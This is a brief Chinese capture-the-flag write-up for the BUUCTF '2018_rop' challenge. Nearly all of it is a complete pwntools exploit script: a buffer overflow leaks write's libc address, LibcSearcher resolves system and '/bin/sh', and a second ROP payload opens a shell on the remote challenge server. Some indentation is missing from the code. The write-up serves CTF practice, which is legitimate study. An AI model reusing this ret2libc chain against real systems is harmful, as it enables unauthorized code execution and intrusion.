buuctf 铁人三项(第五赛区)_2018_rop

常规的32位泄漏libc，比较蛋痛的是我常规的写法不知道为什么出错，以后要多注意recv到的东西

exp：

from pwn import *
from LibcSearcher import *

local_file  = './2018_rop'
local_libc  = './libc.so.6'
remote_libc = './libc.so.6'

select = 1

if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 26332)
#libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims, drop=True  :r.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
gdb.attach(r,cmd)

write_got = elf.got['write']
write_plt = elf.plt['write']
main = elf.sym['main']
p1 = flat(['a'*0x88, 'b'*4, write_plt, main, 1, write_got, 4])
se(p1)
#write_addr = uu32(ru('\xf7')[-4:])
write_addr = uu32(rc())
log.info(hex(write_addr))

libc = LibcSearcher('write', write_addr)
libcbase = write_addr - libc.dump('write')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
p2 = flat(['a'*0x88, 'b'*4, system_addr, 0, binsh_addr])
se(p2)

r.interactive()